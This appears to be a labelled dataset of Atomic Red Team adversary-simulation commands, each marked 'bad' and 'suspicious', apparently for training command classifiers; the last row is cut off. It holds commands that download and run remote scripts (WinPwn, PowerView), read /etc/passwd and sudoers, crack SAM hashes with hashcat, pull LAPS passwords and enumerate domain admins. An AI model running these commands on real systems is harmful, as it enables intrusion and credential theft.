Explorer"" /v svcVersion",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,Find and Display Internet Explorer Browser Version,T1518,"[""T1518""]",windows,0.9,False,"Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8f90332ec1cb88646bfeb4b7,"Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize","Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,Applications Installed,T1518,"[""T1518""]",windows,0.9,False,"Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 78d5cb6d4611766dce6b9fbe,"/usr/libexec/PlistBuddy -c ""print :CFBundleShortVersionString"" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c ""print :CFBundleVersion"" /Applications/Safari.app/Contents/Info.plist","/usr/libexec/PlistBuddy -c ""print :CFBundleShortVersionString"" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c ""print :CFBundleVersion"" /Applications/Safari.app/Contents/Info.plist",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,Find and Display Safari Browser Version,T1518,"[""T1518""]",macos,0.9,False,"Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 977254650bde74852edf184a,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,WinPwn - Dotnetsearch,T1518,"[""T1518""]",windows,0.9,False,Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3dc26cd3ebe651ca603d7295,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,WinPwn - DotNet,T1518,"[""T1518""]",windows,0.9,False,Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 16fa59b34c0b42ec71ef08f6,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1518/T1518.yaml,WinPwn - powerSQL,T1518,"[""T1518""]",windows,0.9,False,Start PowerUpSQL Checks using powerSQL function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d64252bac40f0fb3fecf4c74,cat /etc/passwd > #{output_file} cat #{output_file},cat /etc/passwd > #{output_file} cat #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate all accounts (Local),T1087.001,"[""T1087.001""]",linux,0.9,False,"Enumerate all accounts by copying /etc/passwd to another file ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bc7dd0b71d7b6f6ac86fd528,rm -f #{output_file},rm -f #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate all accounts (Local),T1087.001,"[""T1087.001""]",linux,0.55,True,"Enumerate all accounts by copying /etc/passwd to another file ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f150a45ad1317d044039febc,if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi; if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi; cat #{output_file},if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi; if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi; cat #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,View sudoers access,T1087.001,"[""T1087.001""]","linux,macos",0.9,False,"(requires root) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4af1032d5a2675b966e4090e,grep 'x:0:' /etc/passwd > #{output_file} grep '*:0:' /etc/passwd >> #{output_file} cat #{output_file} 2>/dev/null,grep 'x:0:' /etc/passwd > #{output_file} grep '*:0:' /etc/passwd >> #{output_file} cat #{output_file} 2>/dev/null,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,View accounts with UID 0,T1087.001,"[""T1087.001""]","linux,macos",0.9,False,"View accounts with UID 0 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8994eaca5f735e0b8ed56a37,rm -f #{output_file} 2>/dev/null,rm -f #{output_file} 2>/dev/null,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,View accounts with UID 0,T1087.001,"[""T1087.001""]","linux,macos",0.55,True,"View accounts with UID 0 ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 99cebb626080c3335562b3eb,username=$(id -u -n) && lsof -u $username,username=$(id -u -n) && lsof -u $username,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,List opened files by user,T1087.001,"[""T1087.001""]","linux,macos",0.9,False,"List opened files by user ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ab522d463ba5ac00fd732769,"[ ""$(uname)"" = 'FreeBSD' ] && cmd=""lastlogin"" || cmd=""lastlog"" $cmd > #{output_file} cat #{output_file}","[ ""$(uname)"" = 'FreeBSD' ] && cmd=""lastlogin"" || cmd=""lastlog"" $cmd > #{output_file} cat #{output_file}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Show if a user account has ever logged in remotely,T1087.001,"[""T1087.001""]",linux,0.9,False,"Show if a user account has ever logged in remotely ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d3a59cd4e5913bdce410c319,groups id,groups id,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate users and groups,T1087.001,"[""T1087.001""]","linux,macos",0.9,False,"Utilize groups and id to enumerate users and groups ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3de3e1ace0979270e59ca0aa,dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' dscacheutil -q group dscacheutil -q user,dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' dscacheutil -q group dscacheutil -q user,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate users and groups,T1087.001,"[""T1087.001""]",macos,0.9,False,"Utilize local utilities to enumerate users and groups ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a29409a44d11a1f1541c2085,"net user dir c:\Users\ cmdkey.exe /list net localgroup ""Users"" net localgroup","net user dir c:\Users\ cmdkey.exe /list net localgroup ""Users"" net localgroup",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate all accounts on Windows (Local),T1087.001,"[""T1087.001""]",windows,0.9,False,"Enumerate all accounts Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e472d6f8ff866a7af915d2be,net user get-localuser get-localgroupmember -group Users cmdkey.exe /list ls C:/Users get-childitem C:\Users\ dir C:\Users\ get-localgroup net localgroup,net user get-localuser get-localgroupmember -group Users cmdkey.exe /list ls C:/Users get-childitem C:\Users\ dir C:\Users\ get-localgroup net localgroup,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate all accounts via PowerShell (Local),T1087.001,"[""T1087.001""]",windows,0.9,False,"Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c67dabc056b0d607f58dfeb5,query user,query user,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,Enumerate logged on users via CMD (Local),T1087.001,"[""T1087.001""]",windows,0.9,False,"Enumerate logged on users. Upon execution, logged on users will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 033877ac08dfcdb26185654f,"echo """" | ""#{plink_file}"" -batch ""#{vm_host}"" -ssh -l #{vm_user} -pw ""#{vm_pass}"" ""esxcli system account list""","echo """" | ""#{plink_file}"" -batch ""#{vm_host}"" -ssh -l #{vm_user} -pw ""#{vm_pass}"" ""esxcli system account list""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.001/T1087.001.yaml,ESXi - Local Account Discovery via ESXCLI,T1087.001,"[""T1087.001""]",windows,0.9,False,"An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"" ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3086e552679f943c0b6ac3eb,cd #{hashcat_exe}\.. #{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords},cd #{hashcat_exe}\.. #{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1110.002/T1110.002.yaml,Password Cracking with Hashcat,T1110.002,"[""T1110.002""]",windows,0.9,False,Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ed26498582f7f3d7ab95603f,"del ""PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z"" >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe"" >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\7z"" /Q /S >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip"" /Q /S >nul 2>&1","del ""PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z"" >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe"" >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\7z"" /Q /S >nul 2>&1 del ""PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip"" /Q /S >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1110.002/T1110.002.yaml,Password Cracking with Hashcat,T1110.002,"[""T1110.002""]",windows,0.55,True,Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 414ac1addb596975a34a780e,net user /domain net group /domain,net user /domain net group /domain,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate all accounts (Domain),T1087.002,"[""T1087.002""]",windows,0.9,False,"Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 06049154791b32d7a4e151f9,net user /domain get-localgroupmember -group Users get-aduser -filter *,net user /domain get-localgroupmember -group Users get-aduser -filter *,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate all accounts via PowerShell (Domain),T1087.002,"[""T1087.002""]",windows,0.9,False,"Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review af9883d9a10f06b33815c910,query user /SERVER:#{computer_name},query user /SERVER:#{computer_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate logged on users via CMD (Domain),T1087.002,"[""T1087.002""]",windows,0.9,False,"Enumerate logged on users. Upon exeuction, logged on users will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review de26322e7f8335e44594e927,"Invoke-Expression ""#{adrecon_path}""","Invoke-Expression ""#{adrecon_path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Automated AD Recon (ADRecon),T1087.002,"[""T1087.002""]",windows,0.9,False,"ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ee5ee82ec9f930d59331a9a1,"Get-ChildItem ""PathToAtomicsFolder\..\ExternalPayloads"" -Recurse -Force | Where{$_.Name -Match ""^ADRecon-Report-""} | Remove-Item -Force -Recurse","Get-ChildItem ""PathToAtomicsFolder\..\ExternalPayloads"" -Recurse -Force | Where{$_.Name -Match ""^ADRecon-Report-""} | Remove-Item -Force -Recurse",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Automated AD Recon (ADRecon),T1087.002,"[""T1087.002""]",windows,0.55,True,"ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac5287e2ffa5aff4167b3f15,"""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties","""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Adfind -Listing password policy,T1087.002,"[""T1087.002""]",windows,0.9,False,"Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d3226a4250025277cb03762c,"""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -sc admincountdmp #{optional_args}","""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -sc admincountdmp #{optional_args}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Adfind - Enumerate Active Directory Admins,T1087.002,"[""T1087.002""]",windows,0.9,False,"Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0a5b5026cccbc3d88f08f902,"""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -f (objectcategory=person) #{optional_args}","""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -f (objectcategory=person) #{optional_args}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Adfind - Enumerate Active Directory User Objects,T1087.002,"[""T1087.002""]",windows,0.9,False,"Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bc72f434737b87cacd7f4892,"""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -sc exchaddresses #{optional_args}","""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -sc exchaddresses #{optional_args}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Adfind - Enumerate Active Directory Exchange AD Objects,T1087.002,"[""T1087.002""]",windows,0.9,False,"Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 703586c9f8f614d522d730e1,net user administrator /domain,net user administrator /domain,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate Default Domain Admin Details (Domain),T1087.002,"[""T1087.002""]",windows,0.9,False,"This test will enumerate the details of the built-in domain admin account ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3b6f72ebb56b41fe332840bd,Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain},Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate Active Directory for Unconstrained Delegation,T1087.002,"[""T1087.002""]",windows,0.9,False,"Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 81d85b07631f09ee8a417585,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Get-DomainUser with PowerView,T1087.002,"[""T1087.002""]",windows,0.9,False,"Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5f65faec9e857015acdc5ac6,"([adsisearcher]""objectcategory=user"").FindAll(); ([adsisearcher]""objectcategory=user"").FindOne()","([adsisearcher]""objectcategory=user"").FindAll(); ([adsisearcher]""objectcategory=user"").FindOne()",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate Active Directory Users with ADSISearcher,T1087.002,"[""T1087.002""]",windows,0.9,False,"The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 648a2c907b7933d5bbc8db8b,"(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]""$_"").gPlink){Write-Host ""[+] OU Path:""([ADSI]""$_"").Path;$a=((([ADSI]""$_"").gplink) -replace ""[[;]"" -split ""]"");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host ""Policy Path[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host ""Policy Name[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output ""`n"" }}","(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]""$_"").gPlink){Write-Host ""[+] OU Path:""([ADSI]""$_"").Path;$a=((([ADSI]""$_"").gplink) -replace ""[[;]"" -split ""]"");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host ""Policy Path[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host ""Policy Name[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output ""`n"" }}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate Linked Policies In ADSISearcher Discovery,T1087.002,"[""T1087.002""]",windows,0.9,False,"The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8cfa4db852a677645c6b97a4,"(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]""$_"").gPlink){Write-Host ""[+] Domain Path:""([ADSI]""$_"").Path;$a=((([ADSI]""$_"").gplink) -replace ""[[;]"" -split ""]"");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host ""Policy Path[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host ""Policy Name[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output ""`n"" }}","(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]""$_"").gPlink){Write-Host ""[+] Domain Path:""([ADSI]""$_"").Path;$a=((([ADSI]""$_"").gplink) -replace ""[[;]"" -split ""]"");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host ""Policy Path[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host ""Policy Name[$i]:""([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output ""`n"" }}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Enumerate Root Domain linked policies Discovery,T1087.002,"[""T1087.002""]",windows,0.9,False,"The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4bee90a597e3bf27eac0bf41,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,WinPwn - generaldomaininfo,T1087.002,"[""T1087.002""]",windows,0.9,False,Gathers general domain information using the generaldomaininfo function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 400a9015a8a9d20206fe87b3,"cd ""PathToAtomicsFolder\..\ExternalPayloads"" .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} ""PathToAtomicsFolder\..\ExternalPayloads\username.txt""","cd ""PathToAtomicsFolder\..\ExternalPayloads"" .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} ""PathToAtomicsFolder\..\ExternalPayloads\username.txt""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Kerbrute - userenum,T1087.002,"[""T1087.002""]",windows,0.9,False,Enumerates active directory usernames using the userenum function of Kerbrute,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 442a913d516901f7902d752b,"$target = $env:LOGONSERVER $target = $target.Trim(""\\"") $IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\""Event[System[(EventID=4776)]]""'","$target = $env:LOGONSERVER $target = $target.Trim(""\\"") $IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\""Event[System[(EventID=4776)]]""'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Wevtutil - Discover NTLM Users Remote,T1087.002,"[""T1087.002""]",windows,0.9,False,"This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 772b11eb06ac33cbf117430f,Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx,Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Wevtutil - Discover NTLM Users Remote,T1087.002,"[""T1087.002""]",windows,0.55,True,"This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8518e2eee0bb4d13c25044c0,Get-ADComputer #{hostname} -Properties *,Get-ADComputer #{hostname} -Properties *,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Suspicious LAPS Attributes Query with Get-ADComputer all properties,T1087.002,"[""T1087.002""]",windows,0.9,False,This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fdfc894a9845c0200aa3fba4,"Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime","Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1087.002/T1087.002.yaml,Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property,T1087.002,"[""T1087.002""]",windows,0.9,False,This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and 